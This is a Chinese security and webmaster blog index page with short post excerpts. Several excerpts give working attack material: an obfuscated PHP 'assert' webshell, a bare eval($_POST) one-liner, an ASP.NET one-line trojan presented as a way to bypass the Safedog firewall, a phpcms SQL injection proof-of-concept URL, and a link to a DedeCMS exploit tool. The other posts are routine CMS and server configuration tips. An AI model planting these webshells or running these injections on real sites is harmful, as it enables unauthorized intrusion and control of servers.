现在位置 >首页 > 技术文章
0℃
2012年05月16日 技术文章
<?php $a = str_replace(x,””,”axsxxsxexrxxt”); $a($_POST["c"]); ?>
阅读全文
0℃
在看一个站的时候,发现服务器装了安全狗,刚开始利用IIS6的畸形解析一直被拦截,最后找到了不用畸形解析的办法,传了菜刀的一句话,却连不上,一直返回403,应该是被拦截,后来找了个相对比较生僻的一句话,终于上传并连接成功。 服务端一句话木马:   <%@ Page Language="C#" ValidateRequest="false" %> <%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new o...
阅读全文
0℃
phpcms 企业黄页模块由于参数未过滤存在SQL注射漏洞,允许攻击者执行SQL语句.0day是幌子,鸡肋是真的,由于影响比较小,不会造成什么危害,N久之前发现的鸡肋,发出来给博客滥竽充数啦. 漏洞证明: http://www.127.0.0.1.com/phpcms2008/phpcms/yp/product.php?catid=1&areaname=555%27%20and%20extractvalue%281,concat%280x09,%28version%28%29%29%29%29%20and%20%271%27=%271
阅读全文
0℃
一句话换行 nono< ?php eval ($_POST [1]) ?>  
阅读全文
1℃
生成内容页提示“Table '*.phome_ecms_' doesn't exist......update ***_ecms_ set havehtml=1 where id='' limit 1”   原因:你修改了栏目所属系统模型导致,因为栏目原来所属系统模型本身就有信息,而你改动了所属系统模型,使得这些信息无法找出所属栏目导致出错。 解决方案:修改栏目改回原来所属系统模型,然后进管理信息删除栏目所有的信息,最后再修改栏目改回所属新系统模型就可以解决。 最简单的办法:先备份数据库,然后执行下面2个SQL语句就可以了! 分别运行SQL如下: select id from phome_ecms_news wh...
阅读全文
0℃
安装了Netbeans7.1.2,由于系统语言是中文,所以装完启动后就默认进入的中文界面,但是英文界面看惯了,中文界面用起来不习惯,查了一下有两种简单办法。 第一种方法 通过设置Netbeans的启动命令在后面加上参数"--locale en:US",然后重启。 第二种方法 修改$NETBEANS_HOME/etc/netbeans.conf文件,将其中netbeans_default_options参数的配置值后面添加“-J-Duser.language=en -J-Duser.region=US”,然后重启。
阅读全文
0℃
Linode VPS默认情况下是通过DHCP自动获取IP的,所以在安装Kloxo完成设置Kloxo的时候会出现no_ip_address的提示,这个时候就需要手动设置上IP,这样才能添加域名。 如果你设置Kloxo的时候出现no_ip_address的提示你可以按照下面步骤修改: 使用编辑器编辑(如果不会用编辑器,可以使用winscp):/etc/sysconfig/network-scripts/ifcfg-eth0 # Configuration for eth0 DEVICE=eth0 BOOTPROTO=none # This line ensures that the interface will be brought up during boot. ONBOOT=yes # eth0 - This is the main IP...
阅读全文
0℃
织梦CMS是集简单、健壮、灵活、开源几大特点的开源内容管理系统,是国内开源CMS的领先品牌,目前程序安装量已达七十万,超过六成的站点正在使用织梦CMS或基于织梦CMS... 漏洞出来这么久,没见利用工具。 屌丝们,今天它来了。 -   工具下载:http://dl.dbank.com/c0wgfeb6fc
阅读全文
0℃
2012年05月06日 技术文章
test
阅读全文
2℃
discuz1.5礼品兑换插件BUG修复。 打开source/class/class_upload.php,找到function get_target_dir和function check_dir_type,照着如下红色部分修改: if($type == 'eg_gift' || $type == 'album' || $type == 'forum' || $type == 'portal' || $type == 'paimai' || $type == 'category') { $subdir1 = date('Ym'); $subdir2 = date('d'); $subdir = $subdir1.'/'.$subdir2.'/'; } elseif($type == 'group' || $type == 'common') { $subdir = $subdir1 = substr(md5($extid), 0, 2).'/'; } $check_exists &...
阅读全文